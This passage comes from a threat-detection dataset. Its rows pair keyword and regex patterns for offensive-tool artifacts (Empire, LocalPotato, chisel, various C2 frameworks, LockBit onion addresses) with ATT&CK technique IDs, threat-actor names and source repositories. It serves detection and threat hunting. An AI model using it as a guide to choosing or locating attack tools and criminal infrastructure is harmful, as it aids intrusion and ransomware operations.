Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51199" "*Local:Invoke-PatchDll*",".{0,1000}Local\:Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 
- T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51200" "*local:Invoke-PatchDll*",".{0,1000}local\:Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","51201" "*Local:Invoke-WscriptElevate*",".{0,1000}Local\:Invoke\-WscriptElevate.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - 
T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51202" "*Local:Invoke-WscriptTrigger*",".{0,1000}Local\:Invoke\-WscriptTrigger.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon 
- BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51203" "*Local:Remove-ADS*",".{0,1000}Local\:Remove\-ADS.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51204" 
"*Local:Write-HijackDll*",".{0,1000}Local\:Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51205" "*-local=0.0.0.0:4001*",".{0,1000}\-local\=0\.0\.0\.0\:4001.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","51206" 
"*LocalAdminSharp.csproj*",".{0,1000}LocalAdminSharp\.csproj.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","51207" "*LocalAdminSharp.exe*",".{0,1000}LocalAdminSharp\.exe.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","51208" "*LocalAdminSharp-main*'",".{0,1000}LocalAdminSharp\-main.{0,1000}\'","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","51209" "*localexploit_demo_template.erb*",".{0,1000}localexploit_demo_template\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51210" "*localhost/pipe/pwned*",".{0,1000}localhost\/pipe\/pwned.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","51211" "*localhost/pipe/RustPotato*",".{0,1000}localhost\/pipe\/RustPotato.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#content #namedpipe","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","51212" "*localhost:1337*",".{0,1000}localhost\:1337.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","51213" "*localhost:1337*",".{0,1000}localhost\:1337.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple 
stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","51214" "*localhost:3000*striker*",".{0,1000}localhost\:3000.{0,1000}striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","51215" "*localhost:31337*",".{0,1000}localhost\:31337.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","51216" "*localhost:4567*",".{0,1000}localhost\:4567.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","51217" "*localhost:53531*",".{0,1000}localhost\:53531.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER 
BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","51219" "*localhost:8000/*/hardware*",".{0,1000}localhost\:8000\/.{0,1000}\/hardware.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","51220" "*localhost:8000/*/netscan*",".{0,1000}localhost\:8000\/.{0,1000}\/netscan.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","51221" "*localhost:8000/*/osinfo*",".{0,1000}localhost\:8000\/.{0,1000}\/osinfo.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","51222" "*localhost:8000/*/speedtest*",".{0,1000}localhost\:8000\/.{0,1000}\/speedtest.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","51223" "*localhost:8022*",".{0,1000}localhost\:8022.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control 
framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","51224" "*localhost:8848*",".{0,1000}localhost\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","51225" "*LocalPotato (aka CVE-2023-21746 & HTTP/WebDAV)*",".{0,1000}LocalPotato\s\(aka\sCVE\-2023\-21746\s\&\sHTTP\/WebDAV\).{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51226" "*localpotato -i*",".{0,1000}localpotato\s\-i.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51227" "*LocalPotato.cpp*",".{0,1000}LocalPotato\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51228" "*LocalPotato.exe*",".{0,1000}LocalPotato\.exe.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51229" "*LocalPotato.html*",".{0,1000}LocalPotato\.html.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51230" "*LocalPotato.sln*",".{0,1000}LocalPotato\.sln.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51231" "*LocalPotato.vcxproj*",".{0,1000}LocalPotato\.vcxproj.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51232" "*LocalPotato.zip*",".{0,1000}LocalPotato\.zip.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51233" "*LocalPotato-master*",".{0,1000}LocalPotato\-master.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","51234" "*localreconmodules*",".{0,1000}localreconmodules.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","51235" "*localrelay_linux_amd64*",".{0,1000}localrelay_linux_amd64.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","51236" "*localS4U2Proxy.tickets*",".{0,1000}localS4U2Proxy\.tickets.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","51237" "*localS4U2Proxy.tickets*",".{0,1000}localS4U2Proxy\.tickets.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","51238" "*localtonet.com/download/*",".{0,1000}localtonet\.com\/download\/.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","51240" "*LocateBrc4Config*",".{0,1000}LocateBrc4Config.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team 
and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51252" "*Locedx765al Extensedx765ion Settinedx765gs*",".{0,1000}Locedx765al\sExtensedx765ion\sSettinedx765gs.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","51254" "*lockbit3753ekiocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2id.onion*",".{0,1000}lockbit3753ekiocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2id\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51256" "*lockbit3g3ohd3katajf6zaehxz4h4cnhmz5t735zpltywhwpc6oy3id.onion*",".{0,1000}lockbit3g3ohd3katajf6zaehxz4h4cnhmz5t735zpltywhwpc6oy3id\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 